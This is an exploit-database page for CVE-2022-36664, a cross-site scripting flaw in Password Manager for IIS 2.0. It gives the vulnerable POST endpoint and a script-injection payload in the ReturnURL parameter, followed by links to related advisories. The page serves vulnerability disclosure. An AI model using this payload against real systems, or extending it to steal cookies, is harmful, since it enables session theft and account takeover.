Lucene search
VP4TR10TPACKETSTORM:168599HistoryOct 03, 2022 - 12:00 a.m.
Password Manager For IIS 2.0 Cross Site Scripting
2022-10-0300:00:00
VP4TR10T
packetstormsecurity.com
178
exploit
iis
password manager
cve-2022-36664
cross site scripting
http protocol
EPSS
0.001
Percentile
47.3%
`# Exploit Title: *XSS*
# Exploit Author: *VP4TR10T*
# Vendor Homepage:*http://passwordmanager.adiscon.com/en/manual/
<http://passwordmanager.adiscon.com/en/manual/>
*# Software Link:*http://passwordmanager.adiscon.com/
<http://passwordmanager.adiscon.com/>
*# Version: *Version 2.0
*# Tested on: *WINDOWS*# CVE : *CVE-2022-36664
*Affected URI (when trying to change user password):
POST /isapi/PasswordManager.dll HTTP/1.1
HTTP Payload (Affected Parameter ):
ReturnURL=<script>alert(document.cookie)</script>
*Cordially,*
`
Related
exploitdb
exploitdb
Password Manager for IIS v2.0 - XSS
2023-03-25 00:00:00
cve
cve
CVE-2022-36664
2022-12-26 22:15:10
nvd
nvd
CVE-2022-36664
2022-12-26 22:15:10
zdt
zdt
Password Manager For IIS 2.0 Cross Site Scripting Vulneraility
2022-10-04 00:00:00
Password Manager for IIS v2.0 - XSS Vulnerability
2023-03-27 00:00:00
prion
prion
Cross site scripting
2022-12-26 22:15:00
cvelist
cvelist
CVE-2022-36664
2022-12-26 00:00:00